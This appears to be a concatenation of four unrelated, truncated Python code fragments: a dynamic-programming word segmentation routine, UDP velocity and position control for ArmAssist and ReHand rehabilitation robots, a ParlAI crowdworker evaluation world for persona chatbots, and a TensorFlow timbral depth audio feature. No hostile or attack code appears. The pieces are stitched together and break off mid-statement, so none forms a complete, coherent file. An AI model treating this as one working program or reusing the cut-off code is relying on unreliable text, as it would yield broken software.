Parameters
----------
costs : n_frames(n_frames + 1)/2 vector
For t = 1, 2, ..., N the entries costs[i:i + t] contains the costs of
seq[0:t] up to seq[t - 1:t], with i = t(t - 1)/2. Written out: costs =
[cost(seq[0:1]), cost(seq[0:2]), cost(seq[1:2]), cost(seq[0:3]), ...,
cost(seq[N-1:N])].
Return
------
(summed_cost, boundaries) : (float, vector of bool)
"""
# Initialise
boundaries = np.zeros(n_frames, dtype=bool)
boundaries[-1] = True
alphas = np.inf*np.ones((n_frames, n_segments + 1))
alphas[0, 0] = 0.0
# Forward filtering
i = 0
for t in range(1, n_frames):
for s in range(1, n_segments):
alphas[t, s] = np.min(
costs[i:i + t] + alphas[:t, s - 1]
) # vectorise (?)
i += t
# print("alphas: {}".format(alphas))
# Backward segmentation
t = n_frames
summed_cost = 0.0
s = n_segments
while True:
i = int(0.5*(t - 1)*t)
q_t_min_list = (
costs[i:i + t] + alphas[:t, s - 1]
)
q_t_min_list = q_t_min_list[::-1]
q_t = np.argmin(q_t_min_list) + 1
# print("-"*39)
# print("t = {}".format(t))
# print("q_t_min_list: {}".format(q_t_min_list))
# print("arg min: {}".format(q_t))
# print("Cost: {:.4f}".format(costs[i + t - q_t]))
summed_cost += costs[i + t - q_t]
if t - q_t - 1 < 0:
break
boundaries[t - q_t - 1] = True
t = t - q_t
s -= 1
# print("Utterance loss: {:.4f}".format(summed_cost))
return summed_cost, boundaries
def dp_penalized_n_seg(embedding, z, n_min_frames=0, n_max_frames=15,
dur_weight=0, n_frames_per_segment=7, n_min_segments=0,
dur_weight_func=neg_chorowski):
# Hyperparameters
n_segments = max(1, int(round(z.shape[0]/n_frames_per_segment)))
if n_segments < n_min_segments:
n_segments = n_min_segments
assert n_max_frames*n_segments >= z.shape[0]
# Distances between each z and each embedding (squared Euclidean)
embedding_distances = distance.cdist(z, embedding, metric="sqeuclidean")
# Costs for segment intervals
segment_intervals = get_segment_intervals(z.shape[0], n_max_frames)
costs = np.inf*np.ones(len(segment_intervals))
for i_seg, interval in enumerate(segment_intervals):
if interval is None:
continue
i_start, i_end = interval
dur = i_end - i_start
if dur < n_min_frames:
continue
# cost = np.min(
# np.sum(embedding_distances[i_start:i_end, :], axis=0)
# ) - dur_weight*(dur - 1)
cost = np.min(
np.sum(embedding_distances[i_start:i_end, :], axis=0)
) + dur_weight*dur_weight_func(dur)
costs[i_seg] = cost
# Viterbi segmentation
summed_cost, boundaries = custom_viterbi_n_segments(
costs, z.shape[0], n_segments
)
# Code assignments
segmented_codes = []
j_prev = 0
for j in np.where(boundaries)[0]:
i_start = j_prev
i_end = j + 1
code = np.argmin(np.sum(embedding_distances[i_start:i_end, :], axis=0))
segmented_codes.append((i_start, i_end, code))
j_prev = j + 1
return boundaries, segmented_codes
#-----------------------------------------------------------------------------#
# WORD SEGMENTATION ALGORITHMS #
#-----------------------------------------------------------------------------#
def ag(utterance_list, nruns=4, njobs=3, args="-n 100"):
from wordseg.algos import ag
n_max_symbols = 50 # 100
for i_utt in range(len(utterance_list)):
utterance = utterance_list[i_utt]
utterance_list[i_utt] = (
"_ ".join(utterance[:-1].split("_ ")[:n_max_symbols]) + "_"
)
return list(ag.segment(
utterance_list, nruns=nruns, njobs=njobs, args=args
))
# Other promising options:
# - threshold="absolute", dependency="ftp"
# - threshold="absolute", dependency="mi"
def tp(utterance_list, threshold="relative", dependency="ftp"):
from wordseg.algos import tp
import wordseg.algos
return list(
tp.segment(utterance_list, threshold=threshold, dependency=dependency)
)
def rasanen15(utterance_list, n_max=9, words_count_fn="words.tmp"):
"""
The word decoding with n-grams approach of Räsänen et al. [Interspeech'15].
See | |
system
self._send_command('SetControlMode ArmAssist Global')
def set_trajectory_control(self): #trajectory control with global reference system
self._send_command('SetControlMode ArmAssist Trajectory')
def send_vel(self, vel):
vel = vel.copy()
# units of vel should be: [cm/s, cm/s, rad/s]
assert len(vel) == self.n_dof
# convert units to: [mm/s, mm/s, deg/s] to send them through UDP to the ArmAssist application
vel[0] *= cm_to_mm
vel[1] *= cm_to_mm
vel[2] *= rad_to_deg
# set max speed limts
faster_than_max_speed, = np.nonzero(np.abs(vel) > self.max_speed)
vel[faster_than_max_speed] = self.max_speed[faster_than_max_speed] * np.sign(vel[faster_than_max_speed])
self.debug = True
if self.debug:
# print "vel sent to armassist"
# print vel
if faster_than_max_speed.any() > 0:
print ('faster_than_max_speed')
print (faster_than_max_speed)
print ("speed set to: ")
print (vel)
self._send_command('SetSpeed ArmAssist %f %f %f\r' % tuple(vel))
# get raw position
def get_pos_raw(self):
# udp_feedback_client takes care of converting sensor data to cm or rad, as appropriate for the DOF
#get the last poitns of data of the armassist and low-pass filter
return np.array(tuple(self.source.read(n_pts=1)['data'][self.pos_state_names][0]))
# get filtered position
def get_pos(self):
return np.array(tuple(self.source.read(n_pts=1)['data_filt'][self.pos_state_names][0]))
# calculate vel from raw position
def get_vel_raw(self):
recent_pos_data = self.source.read(n_pts=2)
pos = recent_pos_data['data'][self.pos_state_names]
ts = recent_pos_data['ts']
delta_pos = np.array(tuple(pos[1])) - np.array(tuple(pos[0]))
delta_ts = ts[1] - ts[0]
vel = delta_pos / delta_ts
#filt_vel = np.array([self.vel_command_lpfs[k](vel[k]) for k in range(self.n_dof)]).ravel() #nerea --> to test!
if ts[0] != 0 and any(np.isnan(v) for v in vel):
print ("WARNING -- delta_ts = 0 in AA vel calculation:", vel)
for i in range(3):
if np.isnan(vel[i]):
vel[i] = 0
return vel
#calculate vel from raw position and filter
def get_vel(self):
recent_pos_data = self.source.read(n_pts=2)
pos = recent_pos_data['data'][self.pos_state_names]
ts = recent_pos_data['ts']
delta_pos = np.array(tuple(pos[1])) - np.array(tuple(pos[0]))
delta_ts = ts[1] - ts[0]
vel = delta_pos / delta_ts
if ts[0] != 0 and any(np.isnan(v) for v in vel):
print ("WARNING -- delta_ts = 0 in AA vel calculation:", vel)
for i in range(3):
if np.isnan(vel[i]):
vel[i] = 0
# the first value of the pos because it is always NaN and if a NaN is introduced in the filter, all the following filtered values will be also NaNs
if np.any(np.isnan(vel)):
self.n_getpos_iter = self.n_getpos_iter +1
vel_filt = vel
else:
vel_filt = np.array([self.vel_filter[k](vel[k]) for k in range(self.n_dof)]).ravel()
return vel_filt
def send_pos(self, pos, time):
pos = pos.copy()
# units of vel should be: [cm/s, cm/s, rad/s]
assert len(pos) == 3
# convert units to: [mm/s, mm/s, deg/s]
pos[0] *= cm_to_mm
pos[1] *= cm_to_mm
pos[2] *= rad_to_deg
# mode 1: the forearm angle (psi) stays the same as it is. mode 2: psi will move according to the determined value
mode = 2
pos_command = np.zeros(5)
pos_command[0] = pos[0]
pos_command[1] = pos[1]
pos_command[2] = pos[2]
pos_command[3] = time
pos_command[4] = mode
print ("pos")
print (pos)
print ("time")
print (time)
self._send_command('SetPosition ArmAssist %f %f %f %f %f\r' % tuple(pos_command))
def enable(self):
self._send_command('SetControlMode ArmAssist Global\r')
def disable(self):
self._send_command('SetControlMode ArmAssist Disable\r')
def enable_watchdog(self, timeout_ms):
print ('ArmAssist watchdog not enabled, doing nothing')
def send_traj(self, pos_vel):
pos_vel = pos_vel.copy()
# units of vel should be: [cm/s, cm/s, rad/s]
assert len(pos_vel) == 6
# units to are alread in [mm/s, mm/s, rad/s]
# convert values to integers to reduce noise
#pos_vel_int = np.rint(pos_vel)
pos_vel_int = pos_vel
print ("trajectory sent to AA")
print ("x y psi vx vy vpsi")
print (pos_vel_int)
traj_command = np.zeros(6)
traj_command[0] = pos_vel_int[0]
traj_command[1] = pos_vel_int[1]
traj_command[2] = pos_vel_int[2]
traj_command[3] = pos_vel_int[3]
traj_command[4] = pos_vel_int[4]
traj_command[5] = pos_vel_int[5]
self._send_command('SetTrajectory ArmAssist %d %d %d %d %d %d\r' % tuple(traj_command))
class DummyPlantUDP(object):
drive_velocity_raw = np.array([0,0,0])
drive_velocity_sent = np.array([0,0,0])
drive_velocity_sent_pre_safety = np.array([0,0,0])
pre_drive_state = np.array([0, 0, 0])
def init(self):
pass
def enable(self):
pass
def start(self):
pass
def stop(self):
pass
def write_feedback(self):
pass
def get_pos_raw(self):
return np.array([0,0,0])
def get_pos(self):
return np.array([0,0,0])
def get_vel_raw(self):
return np.array([0,0,0])
def get_vel(self):
return np.array([0,0,0])
class ReHandPlantUDP(BasePlantUDP):
'''Sends velocity commands and receives feedback over UDP. Can be used
with either the real or simulated ReHand.
'''
ssm_cls = ismore_bmi_lib.StateSpaceReHand
addr = settings.REHAND_UDP_SERVER_ADDR
feedback_data_cls = udp_feedback_client.ReHandData
data_source_name = 'rehand'
n_dof = 4
plant_type = 'ReHand'
vel_gain = np.array([rad_to_deg, rad_to_deg, rad_to_deg, rad_to_deg])
max_pos_vals = np.array([60, 60, 60, 90], dtype=np.float64) # degrees
min_pos_vals = np.array([25, 25, 25, 25], dtype=np.float64) # degrees
max_speed = np.array([np.inf, np.inf, np.inf, np.inf], dtype=np.float64) # degrees/sec
#max_speed = np.array([15., 15., 15., 15.], dtype=np.float64) # degrees/sec
feedback_file = open(os.path.expandvars('$HOME/code/bmi3d/log/rehand.txt'), 'w')
def send_vel(self, vel):
vel = vel.copy()
# units of vel should be: [rad/s, rad/s, rad/s, rad/s]
assert len(vel) == self.n_dof
# convert units to: [deg/s, deg/s, deg/s, deg/s]
vel *= rad_to_deg
#filt_vel = np.array([self.vel_command_lpfs[k](vel[k]) for k in range(self.n_dof)]).ravel()
# set max speed limts
faster_than_max_speed, = np.nonzero(np.abs(vel) > self.max_speed)
vel[faster_than_max_speed] = self.max_speed[faster_than_max_speed] * np.sign(vel[faster_than_max_speed])
self.debug = True
if self.debug:
# print 'filt_vel in plants in degrees'
# print filt_vel #*np.array([deg_to_rad, deg_to_rad, deg_to_rad, deg_to_rad])
if faster_than_max_speed.any() > 0:
print ('faster_than_max_speed')
print (faster_than_max_speed)
print ("speed set to: ")
print (vel)
# self.plant.enable() #when we send vel commands always enable the rehand motors
# self._send_command('SystemEnable ReHand\r')
self._send_command('SetSpeed ReHand %f %f %f %f\r' % tuple(vel))
def get_vel_raw(self):
return np.array(tuple(self.source.read(n_pts=1)['data'][self.vel_state_names][0]))
def get_vel(self):
return np.array(tuple(self.source.read(n_pts=1)['data_filt'][self.vel_state_names][0]))
def enable(self):
self._send_command('SystemEnable ReHand\r')
def disable(self):
self._send_command('SystemDisable ReHand\r')
def diff_enable(self,DoFs):
self._send_command('DiffEnable ReHand %i %i %i %i\r' % tuple(DoFs))
def get_enable_state(self):
self._send_command('GetEnableState ReHand\r')
def enable_watchdog(self, timeout_ms):
self._send_command('WatchDogEnable ReHand %d\r' % timeout_ms)
def get_pos_raw(self):
# udp_feedback_client takes care of converting sensor data to cm or rad, as appropriate for the DOF
return np.array(tuple(self.source.read(n_pts=1)['data'][self.pos_state_names][0]))
#get pos filtered
def get_pos(self):
return np.array(tuple(self.source.read(n_pts=1)['data_filt'][self.pos_state_names][0]))
################################################
class BasePlantIsMore(Plant):
# define in subclasses!
aa_plant_cls = None
rh_plant_cls = None
safety_grid = None
both_feedback_str = ''
def __init__(self, *args, **kwargs):
self.aa_plant = self.aa_plant_cls()
self.rh_plant = self.rh_plant_cls()
self.drive_velocity_raw = np.zeros((7,))
self.drive_velocity_sent= np.zeros((7,))
self.drive_velocity_sent_pre_safety = np.zeros((7, ))
self.pre_drive_state = np.zeros((7, ))
self.prev_vel_bl_aa = np.zeros((3, ))*np.NaN
self.prev_vel_bl_rh = np.zeros((4, ))*np.NaN
self.accel_lim_armassist = np.inf #0.8
self.accel_lim_psi = np.inf #0.16
self.accel_lim_rehand = np.inf #0.16
def init(self):
self.aa_plant.init()
self.rh_plant.init()
def start(self):
self.aa_plant.start()
self.rh_plant.start()
self.ts_start_data = time.time()
def stop(self):
self.aa_plant.stop()
self.rh_plant.stop()
def last_data_ts_arrival(self):
return {
'ArmAssist': self.aa_plant.last_data_ts_arrival(),
'ReHand': self.rh_plant.last_data_ts_arrival(),
}
def send_vel(self, vel):
self.aa_plant.send_vel(vel[0:3])
self.rh_plant.send_vel(vel[3:7])
def get_pos_raw(self):
aa_pos = self.aa_plant.get_pos_raw()
rh_pos = self.rh_plant.get_pos_raw()
return np.hstack([aa_pos, rh_pos])
def get_pos(self):
aa_pos = self.aa_plant.get_pos()
rh_pos = self.rh_plant.get_pos()
return np.hstack([aa_pos, rh_pos])
def get_vel_raw(self):
aa_vel = self.aa_plant.get_vel_raw()
rh_vel = self.rh_plant.get_vel_raw()
return np.hstack([aa_vel, rh_vel])
def get_vel(self):
aa_vel = self.aa_plant.get_vel()
rh_vel = self.rh_plant.get_vel()
return np.hstack([aa_vel, rh_vel])
def enable(self):
self.aa_plant.enable()
self.rh_plant.enable()
def disable(self):
self.aa_plant.disable()
self.rh_plant.disable()
def drive(self, decoder):
# print self.aa_plant.aa_xy_ix: [0, 1]
# print self.aa_plant.aa_psi_ix: [2]
# print self.rh_plant.rh_pfings: [0, 1, 2]
# print self.rh_plant.rh_pron_ix: [3]
vel = decoder['qdot']
vel_bl = vel.copy()
current_state = self.get_pos()
self.pre_drive_state = current_state.copy()
self.drive_velocity_raw = vel_bl.copy()
if self.blocking_joints is not None:
vel_bl[self.blocking_joints] = 0
vel_bl_aa0 = vel_bl[0:3].copy()
vel_bl_rh0 = vel_bl[3:7].copy()
### Accel Limit Velocitites ###
# if not np.all(np.isnan(np.hstack((self.prev_vel_bl_aa, self.prev_vel_bl_rh)))):
# aa_output_accel = vel_bl_aa - self.prev_vel_bl_aa
# rh_output_accel = vel_bl_rh - self.prev_vel_bl_rh
# ### AA XY ###
# for i in np.arange(2):
# if aa_output_accel[i] > self.accel_lim_armassist:
# vel_bl_aa[i] = self.prev_vel_bl_aa[i] + self.accel_lim_armassist
# elif aa_output_accel[i] < -1*self.accel_lim_armassist:
# vel_bl_aa[i] = self.prev_vel_bl_aa[i] - self.accel_lim_armassist
# ### AA PSI ###
# if aa_output_accel[2] > self.accel_lim_psi:
# vel_bl_aa[2] = self.prev_vel_bl_aa[2] + self.accel_lim_psi
# elif aa_output_accel[2] < -1*self.accel_lim_psi:
# vel_bl_aa[2] = self.prev_vel_bl_aa[2] - self.accel_lim_psi
# ### RH All ###
# for i in np.arange(4):
# if rh_output_accel[i] > self.accel_lim_rehand:
# vel_bl_rh[i] = self.prev_vel_bl_rh[i] + self.accel_lim_rehand
# elif rh_output_accel[i] < -1*self.accel_lim_rehand:
# vel_bl_rh[i] = self.prev_vel_bl_rh[i] - self.accel_lim_rehand
### Add Attractor ###
if self.safety_grid is not None:
attractor_point_aa = self.safety_grid.attractor_point[:3]
attractor_point_rh = self.safety_grid.attractor_point[3:]
vel_bl_aa_pull = self.attractor_speed_const*(attractor_point_aa - current_state[:3])/0.05
vel_bl_rh_pull = self.attractor_speed_const*(attractor_point_rh - current_state[3:])/0.05
vel_bl_aa = vel_bl_aa0 + vel_bl_aa_pull.copy()
vel_bl_rh = vel_bl_rh0 + vel_bl_rh_pull.copy()
else:
vel_bl_aa = vel_bl_aa0
vel_bl_rh = vel_bl_rh0
### LPF Filter Velocities ###
for s, state in enumerate(['aa_vx', 'aa_vy', 'aa_vpsi']):
vel_bl_aa[s] = self.command_lpfs[state](vel_bl_aa[s])
if np.isnan(vel_bl_aa[s]):
vel_bl_aa[s] = 0
for s, state in enumerate(['rh_vthumb', 'rh_vindex', 'rh_vfing3', 'rh_vprono']):
vel_bl_rh[s] = self.command_lpfs[state](vel_bl_rh[s])
if np.isnan(vel_bl_rh[s]):
vel_bl_rh[s] = 0
self.drive_velocity_sent_pre_safety = np.hstack(( vel_bl_aa.copy(), vel_bl_rh.copy()))
#If the next position is outside of safety then damp velocity to only go to | |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.agents import create_agent_from_shared
from parlai.mturk.core.legacy_2018.agents import TIMEOUT_MESSAGE
from parlai.core.worlds import validate, MultiAgentDialogWorld
from parlai.mturk.core.legacy_2018.worlds import MTurkOnboardWorld
from parlai.core.message import Message
from joblib import Parallel, delayed
import numpy as np
import os
import json
import random
import time
import torch
import copy
# ASK_DETAILED decides whether we ask human evaluators to select individual
# utterances they found bad. The See et al. 2019 paper has this as True; it is
# set False in later works as it adds overhead that isn't used in analysis.
ASK_DETAILED = False
# INSTRUCTIONS
ONBOARD_MSG = '\nWelcome! Below is your persona \
(you can find it on the left side of the chat)\n \
When you are ready to start your conversation, \
click the "I am ready, continue" button below\n'
START_MSG = '\nSuccessfully matched. \
Now let\'s get to know each other through the chat! \n\
You need to finish at least <b>{} chat turns</b>, \
after which you can click the "Done" button to end the chat. \n \
<b>You can track your character description on the left.</b> \n\
<span style="color:blue"><b>Please try to speak to the other person \
as if you are the character assigned.</b></span> \n \
<span style="color:blue"><b>Do not trivially copy \
the character descriptions into the message.</b></span> \n \
<span style="color:red"><b>If you see this message twice, please \
return the hit and accept the next one.</b></span>'
CHAT_NOT_DONE_MSG = 'Sorry, we need at least <b>{} more turn(s)</b> to finish. \
Please send a new message:'
TIMEOUT_MSG = '<b> The other person has timed out. \
Please click the "Done with this HIT" button below to finish this HIT.\
</b>'
EXCEED_MIN_TURNS_MSG = '\n {} chat turns finished! \n \
You can click the "Done" button to end the chat if it\'s your turn '
UNEXPECTED_DISCONNECTION_MSG = 'The other worker unexpectedly diconnected. \n \
Please click <span style="color:blue"><b>Done with this HIT</b>\
</span> button below to finish this HIT.'
CHAT_ENDED_MSG = 'One of you ended the chat. Thanks for your time! \n\
Please click <span style="color:blue"><b>Done with this HIT</b>\
</span> button below to finish this HIT.'
WAITING_MSG = 'Please wait while we match you with another worker...'
NAN_MSG = 'The score you entered must be in [1, 2, 3, 4, 5]. Please \
try again:'
TOO_SHORT_MSG = 'Your message is too short, please make it more than \
<b><span style="color:red">{} words</span></b>.'
TOO_LONG_MSG = 'Your message is too long, please make it less than \
<b><span style="color:red">{} words</span></b>.'
# CHOOSING A TOPIC
PICK_TOPIC_MSG = 'To start, please select a topic on the left, then click the \
\'Pick Topic\' button.'
AFTER_PICK_TOPIC_MSG = 'Thank you for selecting a topic! Now, begin the \
conversation with your partner about the topic.'
PLEASE_WAIT_MSG = 'Your partner will choose a discussion topic. Click the \
button below when you are ready to continue.'
# EVALUATION
OTHER_AGENT_FINISHED_MSG = '<b><span style="color:red">This chat is \
done!</span></b> Please click \
<span style="color:blue"><b>Done with this HIT</b></span> button below \
to finish this HIT.'
# Engagingness
ENGAGINGNESS_MSGS = [
'How much did you enjoy talking to this user?',
# 'How likely would you be to continue talking to this user?',
]
ENGAGINGNESS_CHOICES = ['not at all', 'a little', 'somewhat', 'a lot']
INTERESTINGNESS_MSGS = ['How interesting or boring did you find this conversation?']
INTERESTINGNESS_CHOICES = [
'Very boring',
'A little boring',
'A little interesting',
'Very interesting',
]
LISTENING_MSGS = ['How much did the user seem to pay attention to what you said?']
LISTENING_CHOICES = [
'Always ignored what I said',
'Mostly ignored what I said',
'Mostly paid attention to what I said',
'Always paid attention to what I said',
]
INQUISITIVENESS_MSGS = ['How much did the user try to get to know you?']
INQUISITIVENESS_CHOICES = [
"Didn't ask about me at all",
"Asked about me some",
"Asked about me a good amount",
"Asked about me too much",
]
REPETITIVENESS_MSGS = [
'How repetitive was this user?',
'Please select the sentences that you found repetitive:',
]
REPETITIVENESS_CHOICES = [
'Repeated themselves over and over',
'Sometimes said the same thing twice',
'Always said something new',
]
# Fluency
FLUENCY_MSGS = [
"How naturally did this user speak English?",
'Please select the sentences containing unnatural English:',
]
FLUENCY_CHOICES = [
'Very unnatural',
'Mostly unnatural',
'Mostly natural',
'Very natural',
]
# Consistency
CONSISTENCY_MSGS = [
"How often did this user say something which did <b>NOT</b> make sense?",
("Please select the sentences which did <b>NOT</b> make sense:"),
]
CONSISTENCY_CHOICES = [
'Everything made perfect sense',
"Some responses didn't make sense",
"Most responses didn't make sense",
'Never made any sense',
]
HUMANNESS_MSGS = ['Do you think this user is a bot or a human?']
HUMANNESS_CHOICES = [
'Definitely a bot',
'Probably a bot',
'Probably a human',
'Definitely a human',
]
# Persona
PERSONA_MSG = (
'Which prompt (character) do you think the other user was '
+ 'given for this conversation? \n 1.<br> {} <br> 2.<br> {}'
)
PERSONA_CHOICES = ['1', '2']
def _strip_tensors(act):
"""
Remove all tensor objects from an act to ensure we don't try to serialize them.
"""
return Message({k: v for k, v in act.items() if not torch.is_tensor(v)})
def _random_delay():
time.sleep(max(0, 4 + np.random.randn() * 0.5))
def uppercase(string):
if len(string) == 0:
return string
else:
return string[0].upper() + string[1:]
class PersonasGenerator(object):
def __init__(self, opt):
self.text_file = self._path(opt)
self.personas = self.extract_personas()
def _path(self, opt):
# Build the data if it doesn't exist.
persona = opt['persona_type']
datatype = opt['persona_datatype'].split(':')[0]
dt = datatype + '_' + persona
if datatype == 'test':
return os.path.join(
opt['parlai_home'],
'parlai_internal/projects/convai2/test_set',
dt + '_original_no_cands.txt',
)
return os.path.join(opt['datapath'], 'ConvAI2', dt + '_original_no_cands.txt')
def extract_personas(self):
personas = []
with open(self.text_file, 'r') as f:
lines = f.readlines()
new_persona = []
for line in lines:
if 'persona: ' in line:
new_persona.append(line.split('persona: ')[1].replace('\n', ''))
else:
if new_persona:
personas.append(new_persona)
new_persona = []
return personas
def get_persona(self):
return random.choice(self.personas)
class PersonaAssignWorld(MTurkOnboardWorld):
"""
A world that assigns a persona to an agent.
"""
def __init__(self, opt, mturk_agent):
self.max_persona_time = opt['max_persona_time']
self.human_eval = opt['human_eval']
super().__init__(opt, mturk_agent)
def parley(self):
personas = self.mturk_agent.personas_generator.get_persona()
self.mturk_agent.personas = personas
if not self.human_eval:
# get model personas
model_personas = self.mturk_agent.personas_generator.get_persona()
while model_personas == personas:
model_personas = self.mturk_agent.personas_generator.get_persona()
self.mturk_agent.model_personas = model_personas
persona_text = ''
for persona in personas:
persona_text += '<b><span style="color:blue">' '{}\n</span></b>'.format(
persona.strip()
)
self.mturk_agent.observe(
{
'id': 'SYSTEM',
'show_persona': True,
'text': ONBOARD_MSG + '<br>' + persona_text + '<br>',
}
)
act = self.mturk_agent.act(timeout=self.max_persona_time)
timed_out = self.check_timeout(act)
if timed_out:
self.episodeDone = True
return
def check_timeout(self, act):
if 'text' in act:
if (
(act['text'] == '[TIMEOUT]')
or (act['text'] == '[RETURNED]')
or (act['text'] == '[DISCONNECT]')
):
return True
return False
class ControllableDialogEval(MultiAgentDialogWorld):
def __init__(
self,
opt,
agents=None,
shared=None,
num_turns=6,
max_resp_time=120,
model_agent_opt=None,
world_tag='',
agent_timeout_shutdown=120,
model_config=None,
):
# TURN CONTROL
self.opt = opt
self.turn_idx = 0
self.n_turn = num_turns
self.chat_done = False
self.other_first = random.choice([True, False])
self.model_config = model_config
# DATA
self.start_time = time.time()
self.dialog = []
self.dialog_list = []
self.engagingness_scores = []
self.interestingness_scores = []
self.listening_scores = []
self.consistency_scores = []
self.inquisitiveness_scores = []
self.humanness_scores = []
self.repetitiveness_scores = []
self.fluency_scores = []
self.persona_scores = []
self.task_type = 'sandbox' if opt['is_sandbox'] else 'live'
self.world_tag = world_tag
super().__init__(opt, agents, shared)
# MODEL AGENT SET UP
if model_agent_opt is not None:
self.model_agent = create_agent_from_shared(model_agent_opt)
else:
# case where we test against a human
self.model_agent = None
# TIMEOUT PROTOCOLS
self.max_resp_time = max_resp_time # in secs
self.agent_timeout_shutdown = agent_timeout_shutdown
# PERSONAS
self.bot_seen_persona = False
self.personas = [ag.personas for ag in self.agents]
if self.model_agent is not None:
self.eval_agent = self.agents[0]
self.model_personas = self.agents[0].model_personas
self.model_persona_text = '\n'.join(
['your persona: ' + pers for pers in self.model_personas]
)
else:
self.model_personas = None
for idx in range(len(self.agents)):
if self.agents[idx].id == 'PERSON_1':
self.eval_agent = self.agents[idx]
self.other_agent = self.agents[idx - 1]
break
def get_control_msg(self):
return {'id': 'SYSTEM', 'episode_done': False}
def get_human_agent_act(self, agent):
act = agent.act(timeout=self.max_resp_time)
while self.is_msg_tooshortlong(act, agent):
act = agent.act(timeout=self.max_resp_time)
return act
def format_model_reply(self, text):
switch_list = [(' .', '.'), (' ,', ','), (' ?', '?'), (' !', '!'), (" ' ", "'")]
# add the spaces so that
new_text = text.lower()
# normalize in case of human:
for new, old in switch_list:
new_text = new_text.replace(old, new).replace(' | |
array, this is a required to be the sample rate.
Defaults to 0.
:param phase_correction: bool, perform phase checking before summing to mono. Defaults to False.
:param dev_output: bool, when False return the depth, when True return all extracted
features. Default to False.
:param threshold_db: float/int (negative), threshold, in dB, for calculating centroids.
Should be negative. Defaults to -60.
:param low_frequency_limit: float/int, low frequency limit at which to highpass filter the audio, in Hz.
Defaults to 20.
:param centroid_crossover_frequency: float/int, crossover frequency for calculating the spectral centroid, in Hz.
Defaults to 2000
:param ratio_crossover_frequency: float/int, crossover frequency for calculating the ratio, in Hz.
Defaults to 500.
:param db_decay_threshold: float/int (negative), threshold, in dB, for estimating duration. Should be
negative. Defaults to -40.
:return: float, aparent depth of audio file, float.
Copyright 2018 <NAME>, Institute of Sound Recording, University of Surrey, UK.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
'''
Read input
'''
assert len(audio_tensor.get_shape().as_list(
)) == 3, "tf_timbral_depth :: audio_tensor should be of rank 2 or 3, got {}".format(audio_tensor)
audio_samples, fs = audio_tensor[:, :, 0], fs
b, n = audio_samples.get_shape().as_list()
# audio_samples is now of format BN
fs = float(fs)
'''
Filter audio
'''
max_val = 1.0 / K.max(K.abs(audio_samples), axis=-1, keepdims=True)
# highpass audio - run 3 times to get -18dB per octave - unstable filters produced when using a 6th order
audio_samples = timbral_util.tf_filter_audio_highpass(
audio_samples, crossover=low_frequency_limit, fs=fs)
audio_samples = timbral_util.tf_filter_audio_highpass(
audio_samples, crossover=low_frequency_limit, fs=fs)
audio_samples = timbral_util.tf_filter_audio_highpass(
audio_samples, crossover=low_frequency_limit, fs=fs)
# running 3 times to get -18dB per octave rolloff, greater than second order filters are unstable in python
lowpass_centroid_audio_samples = timbral_util.tf_filter_audio_lowpass(
audio_samples, crossover=centroid_crossover_frequency, fs=fs)
lowpass_centroid_audio_samples = timbral_util.tf_filter_audio_lowpass(
lowpass_centroid_audio_samples, crossover=centroid_crossover_frequency, fs=fs)
lowpass_centroid_audio_samples = timbral_util.tf_filter_audio_lowpass(
lowpass_centroid_audio_samples, crossover=centroid_crossover_frequency, fs=fs)
lowpass_ratio_audio_samples = timbral_util.tf_filter_audio_lowpass(
audio_samples, crossover=ratio_crossover_frequency, fs=fs)
lowpass_ratio_audio_samples = timbral_util.tf_filter_audio_lowpass(
lowpass_ratio_audio_samples, crossover=ratio_crossover_frequency, fs=fs)
lowpass_ratio_audio_samples = timbral_util.tf_filter_audio_lowpass(
lowpass_ratio_audio_samples, crossover=ratio_crossover_frequency, fs=fs)
'''
Get spectrograms and normalise
'''
# normalise audio
max_val = 1.0 / K.max(K.abs(audio_samples), axis=-1, keepdims=True)
lowpass_ratio_audio_samples = max_val * lowpass_ratio_audio_samples
lowpass_centroid_audio_samples = max_val*lowpass_centroid_audio_samples
audio_samples = max_val * audio_samples
# set FFT parameters
nfft = 4096
hop_size = int(3*nfft / 4)
# get spectrogram
nn = len(audio_samples[0])
nn_lp = len(lowpass_centroid_audio_samples[0])
nn_lpr = len(lowpass_ratio_audio_samples[0])
if nn > nfft:
freq, time, spec = timbral_util.compat_spectrogram(
audio_samples, fs,
'hamming', nfft, hop_size, nfft,
False, True, 'spectrum')
lp_centroid_freq, lp_centroid_time, lp_centroid_spec = timbral_util.compat_spectrogram(lowpass_centroid_audio_samples, fs,
'hamming', nfft, hop_size, nfft,
False, True, 'spectrum')
_, _, lp_ratio_spec = timbral_util.compat_spectrogram(lowpass_ratio_audio_samples, fs, 'hamming', nfft,
hop_size, nfft, False, True, 'spectrum')
else:
# file is shorter than 4096, just take the fft
print("Hello problem :!")
freq, _, spec = timbral_util.compat_spectrogram(audio_samples, fs, 'hamming', nn, nn-1,
nfft, False, True, 'spectrum')
lp_centroid_freq, _, lp_centroid_spec = timbral_util.compat_spectrogram(lowpass_centroid_audio_samples, fs,
'hamming',
nn_lp,
nn_lp-1,
nfft, False, True, 'spectrum')
_, _, lp_ratio_spec = timbral_util.compat_spectrogram(lowpass_ratio_audio_samples, fs, 'hamming',
nn_lpr,
nn_lpr-1,
nfft, False, True, 'spectrum')
threshold = timbral_util.db2mag(threshold_db)
# NOTE :: comapt_spectrogram may need to be transposed compared to scipy spectrogram;
'''
METRIC 1 - limited weighted mean normalised lower centroid
'''
all_normalised_centroid_tpower = []
all_normalised_lower_centroid = []
# get metrics for each time segment of the spectrogram
# TODO :: reduce this to this. Should be tested.
all_normalised_lower_centroid = K.sum(
lp_centroid_freq * lp_centroid_spec, axis=[2]) / K.sum(lp_centroid_spec, axis=2)
all_normalised_centroid_tpower = K.sum(spec, axis=-1)
all_normalised_lower_centroid = tf.where(tf.math.greater(
all_normalised_centroid_tpower, threshold), all_normalised_lower_centroid, 0.)
# calculate the weighted mean of lower centroids
"""
weighted_mean_normalised_lower_centroid = np.average(all_normalised_lower_centroid,
weights=all_normalised_centroid_tpower)
all_normalised_lower_centroid = tf.stack(
all_normalised_lower_centroid_array)
"""
weighted_mean_normalised_lower_centroid = timbral_util.tf_average(
all_normalised_lower_centroid, all_normalised_centroid_tpower, epsilon=None)
